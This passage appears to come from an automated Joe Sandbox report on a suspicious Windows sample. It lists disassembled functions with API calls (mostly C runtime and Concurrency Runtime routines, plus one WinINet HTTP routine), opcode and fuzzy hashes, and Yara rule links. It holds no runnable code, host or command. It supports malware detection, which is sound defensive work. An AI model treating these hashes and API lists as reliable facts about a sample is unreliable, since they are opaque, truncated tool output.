                    • Opcode Fuzzy Hash: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction Fuzzy Hash: D321A976904148FFDF11EF9ADC41DDE7BB8EF08244B00816AAB159B521DB31FA448B84
                    Function 0043A5F9 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 0043A60F
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043A61B
                    • _free.LIBCMT ref: 0043A626
                    • _free.LIBCMT ref: 0043A631
                    • _free.LIBCMT ref: 0043A63C
                    • _free.LIBCMT ref: 0043A647
                    • _free.LIBCMT ref: 0043A652
                    • _free.LIBCMT ref: 0043A65D
                    • _free.LIBCMT ref: 0043A668
                    • _free.LIBCMT ref: 0043A676
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction ID: dafaea9898a024bbeaf4eb5fa5a9bd5eb26c9af27a77b3f713287ac740e7ce33
                    • Opcode Fuzzy Hash: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction Fuzzy Hash: 5721EA76980208BFCB02EF95C882CDE7BB9BF08344F00556AF5559F121DB39EA58CB95
                    Function 00445B22 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447CAF), ref: 00445B3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction ID: 82c09db9cbec65f831423c8afe244374c316664d9e9191f84e2616e9823b9814
                    • Opcode Fuzzy Hash: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction Fuzzy Hash: 57518C70804E0ADBEF109F99E88C5AEBFB0FF05315F108157D981A6356CB788A19DF59
                    Function 00427474 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004274C0
                    • SwitchToThread.KERNEL32(?), ref: 004274E3
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00427502
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042751E
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427529
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427550
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 3791123369-3650809737
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: fc4521544dbb6807429d0765a6944cf8e671c5b6cf8d6aaa99cb8baaa305a527
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: B6218734B00325AFCB00EF55D595AAEBBB5BF05315F9040AAE901A7352DB38AE45CB58
                    Function 00426F2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00426F46
                    • GetCurrentProcess.KERNEL32 ref: 00426F4E
                    • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426F63
                    • SafeRWList.LIBCONCRT ref: 00426F83
                      • Part of subcall function 00424F7E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424F8F
                      • Part of subcall function 00424F7E: List.LIBCMT ref: 00424F99
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426F95
                    • GetLastError.KERNEL32 ref: 00426FA4
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426FBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                    • String ID: eventObject
                    • API String ID: 165577817-1680012138
                    • Opcode ID: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction ID: df3dab38d58adcbe0854f5ec81775a9d2d7f31f209f9ace54438c2a0d187fe5a
                    • Opcode Fuzzy Hash: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction Fuzzy Hash: 7B110A75600215E7CB14EFA4ED49FEE33686F04301F614067F505E61D2DB389A04C66D
                    Function 0040BE52 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(00458DD8,00000000,00000000,00000000,00000000), ref: 0040BE8C
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEB0
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0040BEFA
                    • HttpSendRequestA.WININET(?,00000000), ref: 0040BFBA
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C06C
                    • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040C120
                    • InternetCloseHandle.WININET(?), ref: 0040C147
                    • InternetCloseHandle.WININET(?), ref: 0040C14F
                    • InternetCloseHandle.WININET(?), ref: 0040C157
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                    • String ID:
                    • API String ID: 1354133546-0
                    • Opcode ID: f92a2c5220199609d232bb9906de1fae6d9fd6eb88148f3a830a07d45c2ba553
                    • Instruction ID: fc00d707cc8310124706744b4272bec9d664429c83f1612504789ecaecb1249d
                    • Opcode Fuzzy Hash: f92a2c5220199609d232bb9906de1fae6d9fd6eb88148f3a830a07d45c2ba553
                    • Instruction Fuzzy Hash: DCC1E4B1A10118DBDB24CF28CD8879D7B75EF45304F5082AAF508A72D2D7799AC0CF99
                    Function 045059D9 Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction ID: 0f55982fb79583f58f14797ec5a46e556381a19464cc4602ab3c2c71f3a51322
                    • Opcode Fuzzy Hash: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction Fuzzy Hash: 0DC1B078A0424DBFDF25DF99E884BAD7BB0BF49304F04806AE501A72D2E774A941DF61
                    Function 00445772 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction ID: 0c802ae4ab2a979f088469e657098b65825bdc8a12ea5f1622e0d451203c6042
                    • Opcode Fuzzy Hash: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction Fuzzy Hash: 50C125B0E08B499FEF15DF99C881BAE7BB0AF49314F04415BE541AB383D7789901CB69
                    Function 0042EB3A Relevance: 13.6, APIs: 9, Instructions: 148windowCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EB8A
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0042EBA3
                    • Concurrency::location::_Assign.LIBCMT ref: 0042EBB9
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0042EC26
                    • Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0042EC2E
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EC55
                    • Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0042EC61
                    • Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042ECB8
                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0042ECED
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Context$Base::$Processor::QuickVirtual$ClearCountedEventInterlockedReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSchedulerSlotSpinTasksThrowTraceUntilVisible
                    • String ID:
                    • API String ID: 1448206229-0
                    • Opcode ID: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction ID: e01a8d965dbd6924ae1385ea6739976de0ac7696f396b6a9ae4fb0b6a6b071f8
                    • Opcode Fuzzy Hash: ef6b637e53bcacfd24deb09407c1cfd2e164961ead3192c811162a2ec9799835
                    • Instruction Fuzzy Hash: 8051B4347002249FCB04EF66D4C5BAD77A5BF49314F9500AAED069B387CB78AC01CB6A
                    Function 044DC7C9 Relevance: 13.6, APIs: 9, Instructions: 138threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                    • String ID:
                    • API String ID: 3943753294-0
                    • Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction ID: 4ebe81ca8b8bf856aede185294c0683c2f0d17b7c88aef19b0dd7a7181c0c963
                    • Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction Fuzzy Hash: 0C516E35A00605DFDF20DF64C5E496EB7B4BF08315B2444AAE8069B266DB30FD41CF95
                    Function 044E7C58 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044E7C7A
                      • Part of subcall function 044E602F: __EH_prolog3_catch.LIBCMT ref: 044E6036
                      • Part of subcall function 044E602F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044E606F
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 044E7C88
                      • Part of subcall function 044E6C94: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 044E6CB9
                      • Part of subcall function 044E6C94: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 044E6CDC
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044E7CA1
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044E7CAD
                      • Part of subcall function 044E602F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 044E60B8
                      • Part of subcall function 044E602F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 044E60E7
                      • Part of subcall function 044E602F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 044E60F5
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 044E7CF9
                    • Concurrency::location::_Assign.LIBCMT ref: 044E7D1A
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 044E7D22
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044E7D34
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 044E7D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: b71b573db6d630c730369512d1466c9b96c826f8b2f230a19d593c37b7233cd2
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: BE31E630B002556BEF15AABB4491BFEBBB95F4172AF0444AFC841D7342DA25B906C791
                    Function 004279F1 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A13
                      • Part of subcall function 00425DC8: __EH_prolog3_catch.LIBCMT ref: 00425DCF
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425E08
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427A21
                      • Part of subcall function 00426A2D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426A52
                      • Part of subcall function 00426A2D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426A75
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427A3A
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A46
                      • Part of subcall function 00425DC8: InterlockedPopEntrySList.KERNEL32(?), ref: 00425E51
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425E80
                      • Part of subcall function 00425DC8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425E8E
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427A92
                    • Concurrency::location::_Assign.LIBCMT ref: 00427AB3
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00427ABB
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427ACD
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00427AFD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: b103386965f6d4094a94b484948c95d99d8643f9033d24ccfe4d2b4bf8a20aa7
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: 5A312430B082716ACF16AA7864927FF7BB59F41318F4400ABD442D7382DB2D5E0AC399
                    Function 044F0CFD Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 044F0D13
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044E6025,?), ref: 044F0D25
                    • GetCurrentThread.KERNEL32 ref: 044F0D2D
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044E6025,?), ref: 044F0D35
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,044E6025,?), ref: 044F0D4E
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 044F0D6F
                      • Part of subcall function 044E0588: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044E05A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,044E6025,?), ref: 044F0D81
                    • GetLastError.KERNEL32(?,?,?,?,?,044E6025,?), ref: 044F0DAC
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044F0DC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: e0e84582f4bd87a64dafdc611055fc9f471e63b4c77bf4100d0e2e89aa9361db
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: E711D275600301ABEF20AF75AD49FAB3BA8AF55742F180076FE45DA253EA74E4008776
                    Function 00430A96 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00430AAC
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ABE
                    • GetCurrentThread.KERNEL32 ref: 00430AC6
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ACE
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425DBE,?), ref: 00430AE7
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00430B08
                      • Part of subcall function 00420321: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042033B
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425DBE,?), ref: 00430B1A
                    • GetLastError.KERNEL32(?,?,?,?,?,00425DBE,?), ref: 00430B45
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430B5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: d0b6aa9362e501fbcad66dfed5f34ccefc820da40d4b047d48024504de478199
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: E8113A75600301ABC710AFB5AD5AF9F77A89F09705F140176F949D6253EA78E800C779
                    Function 0450281E Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 597776487-1765908331
                    • Opcode ID: 89a3ed0fc6f89cc58b21fccc7c1ecc1ecdd4453b6b678c45aaa3cc4d543d4e8b
                    • Instruction ID: 522c6a4b94f70f02e3c27a389033a88cb7bcdce65cfff907558a73f97f10e483
                    • Opcode Fuzzy Hash: 89a3ed0fc6f89cc58b21fccc7c1ecc1ecdd4453b6b678c45aaa3cc4d543d4e8b
                    • Instruction Fuzzy Hash: 15C16B39A00205AFDB24AF69EC496AA7BA8FF45314F14C4EAF980D72D1E730BD45E750
                    Function 044C5E27 Relevance: 12.4, APIs: 8, Instructions: 435COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 57cbbdc4d76c45f7c06843ec8fb8a05910e3ebdf20c7d86d4a35d6ab44b9dd1a
                    • Instruction ID: 6fb02bbac4bb258c8369858bb11bea59005a8a2d047618ded7074d01c381b789
                    • Opcode Fuzzy Hash: 57cbbdc4d76c45f7c06843ec8fb8a05910e3ebdf20c7d86d4a35d6ab44b9dd1a
                    • Instruction Fuzzy Hash: E1F1C370900218AFEF24DF54CD88BEEBBB9EB44304F5045AEE509A72C1DB75AA84CF55
                    Function 00434950 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00434987
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043498F
                    • _ValidateLocalCookies.LIBCMT ref: 00434A18
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00434A43
                    • _ValidateLocalCookies.LIBCMT ref: 00434A98
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: a:C$csm
                    • API String ID: 1170836740-2000533275
                    • Opcode ID: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction ID: 2ac7ba5ff52def4039f4e408c399c9b7849d7006bd45f8f6dc393843d2f98b86
                    • Opcode Fuzzy Hash: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction Fuzzy Hash: D4410A34A00209ABCF10EF69C845ADF7BB4FF89318F14815BE9156B352D779EA01CB99
                    Function 0041EF6F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _SpinWait.LIBCONCRT ref: 0041EFCC
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EFD8
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EFF1
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041F01F
                    • Concurrency::Context::Block.LIBCONCRT ref: 0041F041
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID: yA
                    • API String ID: 1182035702-575552531
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: c1bac3c45397f19ff15f1c8079396faaf703d4cc50a356fec0ea894be16b9f48
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: F421D3B0D04209DADF24DFA5C8416EEBBF0AF04314F20052FE551A62D2E77D8ACACB59
                    Function 044FED98 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: f974d34388bfc7b8d7e55b3d0da2831ba7f624eda70d1dd885c991811fc1ff03
                    • Instruction ID: edd3bb4821e0e334992581e128a7ea4f1eec55af6bbbcf2d157306d706246d1a
                    • Opcode Fuzzy Hash: f974d34388bfc7b8d7e55b3d0da2831ba7f624eda70d1dd885c991811fc1ff03
